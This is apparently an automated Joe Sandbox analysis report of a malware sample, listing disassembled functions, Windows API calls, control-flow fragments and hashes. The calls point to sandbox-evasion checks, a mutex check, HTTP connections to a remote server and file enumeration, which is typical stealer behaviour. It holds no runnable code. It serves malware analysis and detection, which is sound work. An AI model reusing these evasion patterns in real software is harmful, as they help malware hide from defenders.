1416 22e0556-22e056b 1410->1416 1417 22e05e0-22e05ef 1410->1417 1411->1400 1412->1388 1418 22e06fe-22e0748 1413->1418 1419 22e074b 1413->1419 1414->1413 1420 22e056f-22e057a 1416->1420 1421 22e056d 1416->1421 1417->1380 1418->1419 1419->1406 1422 22e057c-22e0599 1420->1422 1423 22e059b-22e05bb 1420->1423 1421->1417 1428 22e05bd-22e05db 1422->1428 1423->1428 1428->1410
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022E024D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocVirtual
                              • String ID: cess$kernel32.dll
                              • API String ID: 4275171209-1230238691
                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                              • Instruction ID: bc7de75c7c9427a50a3ef4041c81cc4394aa9b353f4eb711bf1bfea546b9a28d
                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                              • Instruction Fuzzy Hash: 93527A74A10229DFDB64CF98C984BACBBB1BF09304F5480D9E50EAB355DB70AA85DF14

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00710C20), ref: 004198A1
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00710C80), ref: 004198BA
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00710C98), ref: 004198D2
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00710AE8), ref: 004198EA
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00710B00), ref: 00419903
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,0070F5A0), ref: 0041991B
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,007061E0), ref: 00419933
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,007064C0), ref: 0041994C
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,007109E0), ref: 00419964
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00710A10), ref: 0041997C
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00710A28), ref: 00419995
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00710B18), ref: 004199AD
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00706280), ref: 004199C5
                                • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00710B60), ref: 004199DE
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                              • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0070F550,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                              • Sleep.KERNEL32(00001770), ref: 00416B04
                              • CloseHandle.KERNEL32(?,00000000,?,0070F550,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                              • ExitProcess.KERNEL32 ref: 00416B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 3511611419-0
                              • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                              • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                              • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                              • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                              Control-flow Graph

                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                              • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                              • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                              • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                              • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1494 401220-401247 call 4189b0 GlobalMemoryStatusEx 1497 401273-40127a 1494->1497 1498 401249-401271 call 41da00 * 2 1494->1498 1500 401281-401285 1497->1500 1498->1500 1502 401287 1500->1502 1503 40129a-40129d 1500->1503 1505 401292-401294 ExitProcess 1502->1505 1506 401289-401290 1502->1506 1506->1503 1506->1505
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                              • __aulldiv.LIBCMT ref: 00401258
                              • __aulldiv.LIBCMT ref: 00401266
                              • ExitProcess.KERNEL32 ref: 00401294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                              • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                              • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                              • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1508 416af3 1509 416b0a 1508->1509 1511 416aba-416ad7 call 41aad0 OpenEventA 1509->1511 1512 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1509->1512 1518 416af5-416b04 CloseHandle Sleep 1511->1518 1519 416ad9-416af1 call 41aad0 CreateEventA 1511->1519 1518->1509 1519->1512
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0070F550,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                              • Sleep.KERNEL32(00001770), ref: 00416B04
                              • CloseHandle.KERNEL32(?,00000000,?,0070F550,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                              • ExitProcess.KERNEL32 ref: 00416B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                              • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                              • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                              • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                              APIs
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00740FA8), ref: 00406303
                                • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00740690,00000000,00000000,00400100,00000000), ref: 00406385
                                • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                              • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                              • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                              • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                              • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocComputerNameProcess
                              • String ID:
                              • API String ID: 4203777966-0
                              • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                              • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                              • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                              • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                              • ExitProcess.KERNEL32 ref: 00401143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                              • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                              • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                              • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00713304
                              • Module32First.KERNEL32(00000000,00000224), ref: 00713324
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255028758.0000000000711000.00000040.00000020.00020000.00000000.sdmp, Offset: 00711000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_711000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFirstModule32SnapshotToolhelp32
                              • String ID:
                              • API String ID: 3833638111-0
                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                              • Instruction ID: 80520c4f463e50a2c99fb30dd32332aa65a413cc20b5b5172dad077ec8825584
                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                              • Instruction Fuzzy Hash: EBF06231100714AFDB203ABD988DBAA76ECAF49724F100528F652D50C0DA78ED864665
                              APIs
                              • SetErrorMode.KERNEL32(00000400,?,?,022E0223,?,?), ref: 022E0E19
                              • SetErrorMode.KERNEL32(00000000,?,?,022E0223,?,?), ref: 022E0E1E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorMode
                              • String ID:
                              • API String ID: 2340568224-0
                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                              • Instruction ID: 53a1e4fbd78a44019b04391a038f3ae8355d6652015821f9a340369cd9bd9a6a
                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                              • Instruction Fuzzy Hash: 97D0123115512877DB003AD4DC09BCD7B1CDF09B66F448021FB0DE9080C7B0964146E5
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                              • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                              • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                              • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                              APIs
                                • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                              • ExitProcess.KERNEL32 ref: 004011C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocName$ComputerExitUser
                              • String ID:
                              • API String ID: 1004333139-0
                              • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                              • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                              • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                              • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00712FEC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255028758.0000000000711000.00000040.00000020.00020000.00000000.sdmp, Offset: 00711000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_711000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                              • Instruction ID: 218e69735b1ebbaa2ba6673d5c632255e4e19571fcf009cb4fd0af86ccf026b3
                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                              • Instruction Fuzzy Hash: 66112B79A00208EFDB01DF98C985E98BBF5AF08750F058094F9489B362D375EA90DB80
                              APIs
                              • wsprintfA.USER32 ref: 004138CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                              • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                              • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                              • FindClose.KERNEL32(000000FF), ref: 00413C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-817767981
                              • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                              • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                              • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                              • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                              • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                              • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
